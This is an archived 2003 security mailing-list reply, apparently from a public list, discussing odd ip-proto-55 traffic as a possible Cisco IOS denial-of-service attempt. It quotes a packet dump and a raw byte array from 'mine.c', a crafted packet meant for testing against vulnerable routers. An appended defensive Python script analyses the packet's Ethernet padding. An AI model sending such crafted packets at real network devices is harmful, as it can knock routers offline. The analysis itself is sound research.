Re: Cisco 0-day? [Was: strange protocol scans (and MOBP plug)]

From: Philippe Biondi (biondi@cartel-securite.fr)
Date: Sun Jul 20 2003 - 04:03:12 PDT


On Sat, 19 Jul 2003, Michal Zalewski wrote:

> On Sat, 19 Jul 2003, Michal Zalewski wrote:
>
> > This traffic is then followed by a storm of ip-proto-55 packets with
> > increasing TTLs from a similar source (this is exhibit #12 in the
> > museum, posted with full packet dumps and such). What's going on?
>
> I've just realized ip-proto-55 was one of the possible vectors for the
> latest Cisco IOS vulnerability, so it is possible that this particular
> aspect of the observed traffic is just a DoS attempt.
>
> The observed traffic seems to be considerably different from what is
> generated by the publicly available exploit (shadowchode, see
> http://www.netsys.com). This one generates considerably shorter packets
> with no payload, and increases TTL subsequently, see previous post:
>
> 22:53:00.340000 80.50.156.4 > 195.117.3.59: ip-proto-55 0 (ttl 2, id
> 60107)
>
>         4500 0014 eacb 0000 0237 1b01 5032 9c04
>         c375 033b 0000 0000 0000 0000 0000 0000
>         0000 0000 0000 0000 0000 035a 383d
>
> I've isolated the packet, could anyone test
> http://lcamtuf.coredump.cx/mine.c against a vulnerable Cisco?

from mine.c:

unsigned char data[]={
/* IPv4 header: version/IHL, TOS, total length 0x14 (20), ID, flags/fragment
   offset, TTL 0, protocol 0x37 (55), header checksum */
0x45,0,0,0x14,0xfd,0xb1,0,0,0,0x37,0x08,0x1b,
80,50,156,4, /* bogus source */
0,0,0,0,     /* destination address (zero here) */
/* 26 bytes beyond the IP total length: Ethernet frame padding, not IP payload */
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0x23,0x12,0x77,0xaf};

The last line is Ethernet padding, it should not be needed in the exploit
and may be the sign of an Etherleak vulnerability in your LAN.

-- 
Philippe Biondi <biondi@ cartel-securite.fr> Cartel Sécurité
Security Consultant/R&D                      http://www.cartel-securite.fr
PGP KeyID:3D9A43E2  FingerPrint:C40A772533730E39330DC0985EE8FF5F3D9A43E2
    
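The padding observation in the reply above, turned into a check an analyst can run over a capture, as an added example that is not part of the original post or of mine.c. It parses the 46-byte packet quoted from tcpdump (re-typed here from the hex dump in the message), verifies the IPv4 header checksum, and separates the bytes covered by the IP total length from the trailing bytes. A 20-byte IP datagram is padded to the 46-byte Ethernet minimum payload, and that padding should be all zeros; non-zero trailing bytes, as in the quoted packet and in the mine.c array, are what the reply points at as a possible Etherleak indicator. The `ETH_MIN_PAYLOAD` constant and the function names are this example's own.

```python
"""Flag non-zero Ethernet padding behind a short IPv4 datagram.

Added example, not code from the original post. It parses the packet quoted
in the message and reports whether the bytes past the IP total length
(which can only be Ethernet minimum-frame padding) contain anything other
than zeros.
"""
import struct

# The tcpdump hex dump quoted in the message, re-typed as one string.
QUOTED_DUMP = (
    "4500 0014 eacb 0000 0237 1b01 5032 9c04 "
    "c375 033b 0000 0000 0000 0000 0000 0000 "
    "0000 0000 0000 0000 0000 035a 383d"
)

# 60-byte minimum Ethernet frame minus the 14-byte Ethernet header.
ETH_MIN_PAYLOAD = 46


def hexdump_to_bytes(dump: str) -> bytes:
    """Turn a whitespace-separated hex dump into raw bytes."""
    return bytes.fromhex(dump.replace(" ", ""))


def ip_checksum(header: bytes) -> int:
    """RFC 791 header checksum: one's complement of the one's-complement sum."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4(packet: bytes) -> dict:
    """Parse the fixed IPv4 header and split the packet at the IP total length."""
    if len(packet) < 20:
        raise ValueError("packet shorter than an IPv4 header")
    (ver_ihl, _tos, total_len, ident, _frag, ttl, proto, csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or ihl > len(packet) or total_len < ihl:
        raise ValueError("not a well-formed IPv4 header")
    header = packet[:ihl]
    # Recompute the checksum over the header with the checksum field zeroed.
    zeroed = header[:10] + b"\x00\x00" + header[12:]
    return {
        "total_length": total_len,
        "id": ident,
        "ttl": ttl,
        "protocol": proto,
        "src": ".".join(map(str, src)),
        "dst": ".".join(map(str, dst)),
        "checksum_ok": ip_checksum(zeroed) == csum,
        "ip_payload": packet[ihl:total_len],
        # Anything past the IP total length is link-layer padding, not IP data.
        "trailer": packet[total_len:],
    }


def padding_report(packet: bytes) -> dict:
    """Classify the trailing bytes: expected padding length and whether it is clean."""
    fields = parse_ipv4(packet)
    trailer = fields["trailer"]
    fields["padding_expected"] = max(0, ETH_MIN_PAYLOAD - fields["total_length"])
    fields["padding_len"] = len(trailer)
    fields["padding_nonzero"] = any(trailer)
    # Non-zero padding means the sending stack filled the frame with something
    # other than zeros; worth a closer look at that host's driver.
    fields["suspicious"] = len(trailer) > 0 and any(trailer)
    return fields


if __name__ == "__main__":
    report = padding_report(hexdump_to_bytes(QUOTED_DUMP))
    for key in ("src", "dst", "protocol", "ttl", "id", "checksum_ok",
                "total_length", "padding_expected", "padding_len",
                "padding_nonzero", "suspicious"):
        print("%-17s %s" % (key, report[key]))
    print("trailer           %s" % report["trailer"].hex())
```

Run as a script it prints the parsed header fields and the 26-byte trailer of the quoted packet; the IP header checksum in the dump verifies, which confirms the 20-byte total length is what the sender intended and that the trailer really is padding rather than truncated payload.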
    
    
    



This archive was generated by hypermail 2b30 : Sun Jul 20 2003 - 10:46:36 PDT